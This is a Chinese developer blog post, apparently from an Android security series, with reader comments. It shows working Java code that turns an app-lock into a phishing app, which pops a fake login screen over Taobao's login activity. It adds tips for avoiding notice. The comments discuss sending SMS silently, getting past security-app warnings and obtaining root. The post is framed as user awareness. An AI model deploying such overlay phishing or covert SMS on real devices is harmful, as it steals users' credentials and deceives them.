`
su1216
  • 浏览: 671183 次
  • 性别: Icon_minigender_1
  • 来自: 北京
博客专栏
Group-logo
深入入门正则表达式(jav...
浏览量:71933
E60283d7-4822-3dfb-9de4-f2377e30189c
android手机的安全问...
浏览量:128791
社区版块
存档分类
最新评论

android安全问题(三) 钓鱼程序

阅读更多

导读:文本介绍一种钓鱼应用,讲述如何骗取用户的用户名和密码,无须root

 

这个话题是继续android安全问题(二) 程序锁延伸的

 

之前我已经展示了如何制作程序锁。当打开指定应用的时候,弹出一个密码页面。

程序锁的话题虽然是和安全相关,但是这应该属于防范的范围,如果被人恶意利用,那么后果……

这期我来揭示一下一种钓鱼程序的原理,希望广大用户不要上当受骗,最主要的是:希望大家意识到安全问

 

之前我用定时扫描activity的方法来检查打开的页面是不是我们所需要的页面

ComponentName topActivity = mActivityManager.getRunningTasks(1).get(0).topActivity;

 

如何用于钓鱼呢?比如我打开了淘宝,然后想登录,查看一下我淘宝,这时候会打开下面这个页面

 

从log中我们能得到其包和类的信息

log 写道
10-17 10:02:14.698: I/ActivityManager(246): Displayed com.taobao.taobao/com.taobao.tao.LoginActivity: +305ms

恩,这就好办了,下面我只需改三处,程序锁这个应用就会变成调用应用

第一个修改很简单,修改我们监听的包名和类名即可

String testPackageName = "com.taobao.taobao";
String testClassName = "com.taobao.tao.LoginActivity";

完整代码

public class LockTask extends TimerTask {
	public static final String TAG = "LockTask";
	private Context mContext;
	String testPackageName = "com.taobao.taobao";
	String testClassName = "com.taobao.tao.LoginActivity";

	private ActivityManager mActivityManager;

	public LockTask(Context context) {
		mContext = context;
		mActivityManager = (ActivityManager) context.getSystemService("activity");
	}

	@Override
	public void run() {
		ComponentName topActivity = mActivityManager.getRunningTasks(1).get(0).topActivity;
		String packageName = topActivity.getPackageName();
		String className = topActivity.getClassName();
		Log.v(TAG, "packageName" + packageName);
		Log.v(TAG, "className" + className);

		if (testPackageName.equals(packageName)
				&& testClassName.equals(className)) {
			Intent intent = new Intent();
			intent.setClassName("com.example.locktest", "com.example.locktest.PasswordActivity");
			intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
			mContext.startActivity(intent);
		}
	}
}

 

第二个修改有些技术含量,可能会需要一个专业的美工,来仿造一个淘宝的登录页面,就如上图所示的那样

最后一个修改,当病毒获取了用户名和密码之后,就不要再继续监听了,不然次数多了肯定会被发现

 

为了尽量不让用户察觉,可以把频率调高一些,比如500ms检查一次,这样用户就很难察觉了

测试项目完整源码见附件,代码是以android4.0为基础写的(当然,我的钓鱼页面是简陋的,只是用于演示)

 

 

无论是程序锁还是钓鱼程序,他们可能都担心耗电问题,因为耗电过多也会引起用户的注意

我们可以降低检查频率(当然,钓鱼程序是不会这么干的)

我们可以监控屏幕状态,当屏幕关闭的时候,我们可以停止监听,这时候也没有必要监听,当点亮的时候我们再监听

如何监听屏幕状态?

我们需要监听下面两个action

 

Intent.ACTION_SCREEN_OFF

Intent.ACTION_SCREEN_ON

还有一个要求,就是要动态注册才可以,不能在manifest中注册

其余的事情大家就自己实现吧

 

 

 

 

android手机root后的安全问题 (一)

android手机root后的安全问题 (二)

android手机root后的安全问题 (三)

android手机root后的安全问题 (四)

 

android安全问题(一) 静音拍照与被拍

android安全问题(二) 程序锁

android安全问题(三) 钓鱼程序

android安全问题(四) 抢先开机启动 - 结果篇

android安全问题(五) 抢先拦截短信 - 结果篇

 

 

请大家不要用root的手机随意下载软件,更不要以任何借口制造任何病毒!

 

 

转贴请保留以下链接

本人blog地址

http://su1216.iteye.com/

http://blog.csdn.net/su1216/

 

1
5
分享到:
评论
13 楼 su1216 2012-12-19  
gundumw100 写道
像有些信用卡管理软件,当银行发送短信过来的时候,它就截取到该短信,然后统计一个月消费的费用。截取到该短信的时候可能会弹出“XXX正试图接收短信,此操作可能产生危险,是否允许本次操作?”除非你勾选了“信任该软件,以后不再提示”。这样以后就不会有了。
楼主可以下载一个卡牛试试!

这些软件是哪出的?如果是银行出的,那可能值得信任
如果用户信任这些软件,那就应该去360等程序中给其权限
12 楼 gundumw100 2012-12-19  
像有些信用卡管理软件,当银行发送短信过来的时候,它就截取到该短信,然后统计一个月消费的费用。截取到该短信的时候可能会弹出“XXX正试图接收短信,此操作可能产生危险,是否允许本次操作?”除非你勾选了“信任该软件,以后不再提示”。这样以后就不会有了。
楼主可以下载一个卡牛试试!
11 楼 su1216 2012-12-19  
gundumw100 写道
关键是如何得到root权限,用户又不懂的喽,最好当用户第一次启动软件的时候就让它获得root权限,这个怎么弄?

看我这个系列的帖子
http://www.iteye.com/blogs/subjects/android_security
10 楼 su1216 2012-12-19  
gundumw100 写道
就是要让用户觉得这个软件是安全的!

获取了root权限的软件才危险。。
9 楼 gundumw100 2012-12-19  
就是要让用户觉得这个软件是安全的!
8 楼 gundumw100 2012-12-19  
关键是如何得到root权限,用户又不懂的喽,最好当用户第一次启动软件的时候就让它获得root权限,这个怎么弄?
7 楼 su1216 2012-12-19  
gundumw100 写道
我的手机是小米1,我装了360,有可能是360搞的鬼!
如何通过一个Button获得root权限?有的软件安装完会弹出对话框说需要root权限,这个怎么搞的?

“如何通过一个Button获得root权限?”是什么意思??

有的软件安装完会弹出对话框说需要root权限,这个怎么搞的?
执行su,superuser就会弹出提示
6 楼 su1216 2012-12-19  
gundumw100 写道
我的手机是小米1,我装了360,有可能是360搞的鬼!
如何通过一个Button获得root权限?有的软件安装完会弹出对话框说需要root权限,这个怎么搞的?

360有个叫主动防御的功能,就是这个功能拦截的

我之前测试过,得到root权限后,我可以绕过360,偷偷的发短信
至于偷偷接收短信,我觉得也可以,这个你自己研究吧
5 楼 gundumw100 2012-12-19  
我的手机是小米1,我装了360,有可能是360搞的鬼!
如何通过一个Button获得root权限?有的软件安装完会弹出对话框说需要root权限,这个怎么搞的?
4 楼 su1216 2012-12-19  
gundumw100 写道
LockTest正试图接收短信,此操作可能产生危险,是否允许本次操作?
NND,不能上图!这个提示应该你也碰到过吧?怎么避开它?

你这是“默认”吗!
这是什么360、LBE之类的东西弹出来的吧
而且你的手机root过了,是吧
3 楼 gundumw100 2012-12-19  
LockTest正试图接收短信,此操作可能产生危险,是否允许本次操作?
NND,不能上图!这个提示应该你也碰到过吧?怎么避开它?
2 楼 su1216 2012-12-19  
gundumw100 写道
如何悄悄的发送短信而不让用户察觉到?
private void sendSMS(String content){
SmsManager smsManager = SmsManager.getDefault();
PendingIntent sentIntent = PendingIntent.getBroadcast(context, 0, new Intent(), 0);
smsManager.sendTextMessage(phoneNumber, null, content, sentIntent, null);
}
默认会弹出警告框,如何避开它?


默认会弹出警告框??谁弹出的
截图看看,我怎么没什么印象
1 楼 gundumw100 2012-12-19  
如何悄悄的发送短信而不让用户察觉到?
private void sendSMS(String content){
SmsManager smsManager = SmsManager.getDefault();
PendingIntent sentIntent = PendingIntent.getBroadcast(context, 0, new Intent(), 0);
smsManager.sendTextMessage(phoneNumber, null, content, sentIntent, null);
}
默认会弹出警告框,如何避开它?

相关推荐

    Android安全技术揭秘与防范带目录

    《Android安全技术揭秘与防范》是一本专注于探讨和解析Android平台安全问题的专业书籍。它涵盖了广泛的安全主题,旨在帮助开发者、安全研究人员以及普通用户理解Android系统中的潜在风险,并提供有效的防范措施。书...

    ANDROID安全架构深究.7z

    本资源“ANDROID安全架构深究”深入探讨了这一主题,为开发者和安全研究者提供了宝贵的洞察力。以下是对Android安全架构的详细解读: 1. **权限管理系统**:Android的权限模型是基于权限的,每个应用在安装时都会被...

    Android项目源码(手机安全卫士)

    【Android项目源码(手机安全卫士)】是一款基于Android平台的应用程序,旨在提供全面的手机安全管理服务。这个开发案例提供了完整的源代码,为开发者深入理解Android应用开发提供了宝贵的资源。下面将对该项目的...

    基于Android系统的网络安全问题研究.pdf

    Android系统网络安全问题研究 随着智能手机和平板电脑的普及,基于Android系统的移动设备成为了人们日常生活中不可或缺的一部分。Android系统因其开源特性获得了巨大的市场喜爱,然而,这种开放性也给系统带来了...

    Android 安全培训Sample

    在Android安全培训Sample中,我们主要探讨的是关于Android应用程序的安全性,这关乎到用户的隐私保护、数据安全以及应用的稳定性。Android系统作为一个开放源码的移动操作系统,虽然提供了丰富的功能和自由度,但也...

    Android智能手机信息安全问题与对策分析.pdf

    然而,Android存在一个最高权限的用户——root用户,一旦恶意软件获取root权限,便能不受限制地操作任何文件,这是Android安全的一大隐患。 针对这些安全问题,Android智能手机常见的攻击方式包括: 1. 硬件攻击:...

    Android应用第三方推送服务安全分析与安全增强.pdf

    在移动应用领域,尤其是Android平台,第三方推送服务已经成为智能手机应用程序的基本服务之一。这些服务由官方和第三方公司提供,帮助开发者实现消息的实时推送,提高用户体验。然而,为了降低资源成本,部分第三方...

    Android安全检测

    《Android安全检测》这本书深入探讨了Android系统的安全性问题,旨在帮助开发者、安全研究人员以及普通用户了解和防范Android平台上的各种安全威胁。以下是一些关键的知识点: 1. **Android系统架构**:Android是一...

    Android安全机制解析与应用实践【高清】

    根据提供的标题“Android安全机制解析与应用实践【高清】”以及描述内容,我们可以推断出这份资料主要聚焦于Android平台的安全机制及其实际应用场景。虽然给定的部分内容并未提供具体的知识点,但基于标题和描述,...

    Android手机安全卫士V1.0

    然而,随着技术的发展,手机安全问题日益凸显,恶意软件、隐私泄露等问题频繁出现,这就需要一款强大的手机安全软件来保驾护航。"Android手机安全卫士V1.0"便是为此目的而诞生的,它专为Android用户设计,致力于提供...

    基于Android系统的手机安全卫士毕业设计.docx

    Android系统的架构分为三个主要层次:应用程序框架、系统运行库和Linux内核。应用程序框架为开发者提供了构建应用的工具,包括Activity Manager、Content Provider、Intent等组件,使得应用间的交互变得简单且灵活。...

    Android智能终端二维码安全检测系统的设计与实现.pdf

    "Android智能终端二维码安全检测系统的设计与实现" ...Android智能终端二维码安全检测系统的设计与实现 旨在提供一个安全、可靠、易用的二维码安全检测系统,保护用户免受恶意钓鱼网站、手机病毒、恶意程序等攻击。

    Android软件安全攻防对抗技术及发展.pdf

    Android软件的安全问题不仅关乎用户隐私,还直接影响到整个系统的稳定性与可靠性。 【渗透攻击技术】 Android软件的安全渗透攻击主要涉及以下几个方面: 1. **逆向工程**:攻击者通过反编译APK文件,理解应用程序的...

    Android百万设备面临安全风险.pdf

    在Android平台上,数百万设备面临着严重的安全风险,主要源自各种恶意软件和网络钓鱼攻击。这些威胁不仅对用户个人信息造成威胁,也可能对整个Android生态系统的稳定性构成挑战。以下是一些关键的安全知识点: 1. *...

    android恶意程序分析 (四)

    在“Android恶意程序分析(四)”这一主题中,我们主要关注的是如何深入理解并分析Android应用程序中的恶意代码。在Android系统中,恶意程序可能隐藏在各种文件中,包括资源文件、字节码文件等。这里提到的压缩包子...

    Securing Android Eco-System James Fang.zip

    James Fang,作为一位资深的安全专家,通过他的研究和实践经验,为我们揭示了Android安全的关键方面。 一、Android系统架构与安全 Android系统基于Linux内核,它的开放源码特性使得它具有高度可定制性,但也成为...

    Android 5.0 Browser源码

    Android 5.0浏览器在安全方面也有显著增强,包括HTTPS的默认启用、网站身份验证、TLS/SSL协议的更新,以及对恶意软件和网络钓鱼攻击的防护。 **6. 性能优化** 为了提供更好的用户体验,Android 5.0浏览器源码中包含...

    Android_AdvisorPDF

    【Android Advisor PDF】是针对Android操作系统的一份专业指南,它可能包含了关于如何优化、使用、理解和解决问题的详尽信息。这份资源很可能旨在帮助用户更好地掌握Android设备的各个方面,包括但不限于系统设置、...

Global site tag (gtag.js) - Google Analytics